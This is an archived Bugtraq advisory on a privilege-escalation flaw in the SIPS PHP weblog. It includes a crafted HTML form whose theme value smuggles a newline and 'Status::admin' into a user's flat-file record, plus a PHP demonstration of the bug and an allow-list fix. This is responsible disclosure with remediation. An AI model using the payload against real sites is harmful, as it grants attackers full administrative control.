[24259] in bugtraq
SIPS - vulnerable to anyone gaining admin access.
daemon@ATHENA.MIT.EDU (b0iler _)
Wed Feb 13 17:50:32 2002
From: "b0iler _" <b0iler@hotmail.com>
To: bugtraq@securityfocus.com
Date: Mon, 11 Feb 2002 23:13:11 -0700
Message-ID: <F460Puz63Bma4RCIlWr00002b4c@hotmail.com>
#!/exploit/by/b0iler
# sips - http://sourceforge.net/projects/sips/
# affected: versions lower than 0.3.1
Taken from freshmeat: "About: SIPS is an integrated Weblog and link-indexing
system written in PHP. It is aimed at those with access to databaseless,
PHP-enabled Web servers who want to run a Weblog site like Slashdot and/or a
simple link index like Yahoo!."
OK, this one took a while to find since the code is long, but at least it was
fairly easy to read. The script works much like PHP-Nuke or Slashcode; SIPS
stands for Simple Internet Publishing System. The problem I found is that
when a user selects a theme, the theme name is written into that user's
flat-file database record without being filtered. When the user later opens
admin.php, the script only checks that the user's password is correct and
that the record contains a Status value equal to admin. So I did a little
playing around and got a theme name containing a line break to write
Status::admin onto the end of the user's record. That makes the user an
admin of the script and gives them complete control over the site.
The key to securing this code is to filter all input, even input you think
the user cannot change (a <select> value, a hidden field) -- it can be.
Checking that the selected theme actually exists would also be a good idea.
To exploit this, we just need to change the theme page (the form that
submits the theme choice) to something like this:
<form action="http://www.site.com/sips/htdocs/preferences.php"
method="post">
<input type="hidden" name="op" value="theme">
<input type="hidden" name="action" value="settheme">
<select name="themename">
<option value="default
Status::admin
">Exploited</option>
</select>
<input type="submit" value="Set Theme"></form>
Here we submit a theme whose value is:
  default        (followed by a line break)
  Status::admin  (followed by a second line break, because SIPS chops the
                  theme input)
This changes the user's record from something like this:
bash-2.03$ cat user
Password::660120d6fbc1sn241be39290636b2942
Email::b0iler@hotmail.com
Theme::default
Timezone::Greenwich Mean
to something like this:
bash-2.03$ cat user
Password::660120d6fbc1sn241be39290636b2942
Email::b0iler@hotmail.com
Timezone::Greenwich Mean
Theme::default
Status::admin
The Status::admin line allows you to use
http://www.site.com/sips/htdocs/admin/index.php, which gives you total
control over SIPS (and, in practice, the whole site).
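To make the mechanism concrete, here is an added PHP illustration of the same bug and its fix. This is not SIPS's code and not the 0.3.1 patch; the record format follows the "Key::value" layout shown above, while the function names, the temp file and the list of installed themes are assumptions made for the example.

```php
<?php
// Added example, not SIPS's own code: a flat-file "Key::value" user record,
// a theme setter that writes the submitted value unfiltered (the bug), and a
// hardened setter that allow-lists the theme name. Function names, file
// layout and the installed-theme list are assumptions for illustration.

// Parse "Key::value" lines into an array. A later key overrides an earlier
// one, so an injected "Status::admin" line at the end of the file is honoured.
function parse_user_file(string $path): array {
    $rec = [];
    foreach (file($path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $line) {
        if (strpos($line, '::') === false) {
            continue;
        }
        [$key, $value] = explode('::', $line, 2);
        $rec[$key] = $value;
    }
    return $rec;
}

function write_user_file(string $path, array $rec): void {
    $out = '';
    foreach ($rec as $key => $value) {
        $out .= $key . '::' . $value . "\n";   // no escaping of $value
    }
    file_put_contents($path, $out);
}

// Vulnerable: whatever the form submits as the theme is stored as-is, so the
// value "default\nStatus::admin" becomes two lines in the record.
function set_theme_vulnerable(string $path, string $theme): void {
    $rec = parse_user_file($path);
    $rec['Theme'] = $theme;
    write_user_file($path, $rec);
}

// Hardened: the theme must be a plain name and must be one of the installed
// themes, so a line break (or a path) can never reach the record file.
function set_theme_hardened(string $path, string $theme, array $installed): bool {
    if (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $theme) || !in_array($theme, $installed, true)) {
        return false;   // reject; the caller reports an error to the user
    }
    $rec = parse_user_file($path);
    $rec['Theme'] = $theme;
    write_user_file($path, $rec);
    return true;
}

// The admin check the advisory describes: a Status::admin line in the record.
function is_admin(array $rec): bool {
    return isset($rec['Status']) && $rec['Status'] === 'admin';
}

// Demonstration on a constructed user record (hash and address are made up).
$original = "Password::660120d6fbc1sn241be39290636b2942\n"
          . "Email::user@example.com\n"
          . "Theme::default\n";
$path = tempnam(sys_get_temp_dir(), 'sips_user_');
file_put_contents($path, $original);

// What the <option value="default\nStatus::admin\n"> in the advisory submits
// (trailing newline already chopped, as the text says SIPS does).
$payload = "default\nStatus::admin";

set_theme_vulnerable($path, $payload);
var_dump(is_admin(parse_user_file($path)));   // bool(true): escalated to admin

file_put_contents($path, $original);          // reset and retry, hardened
$accepted = set_theme_hardened($path, $payload, ['default', 'plain']);
var_dump($accepted, is_admin(parse_user_file($path)));   // bool(false) bool(false)

unlink($path);
```

The allow-list is the important part: stripping "\n" alone would stop this payload but not a future delimiter the file format might grow, whereas comparing against the themes that actually exist on disk rejects everything that is not a theme name.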
The author was contacted on 2/1/02 and replied the same day. The author
released version 0.3.1 on 2/8/02 and wrote a very nice page detailing the
problem and possible solutions: http://sips.sourceforge.net/adminvul.html
-http://b0iler.advknowledge.net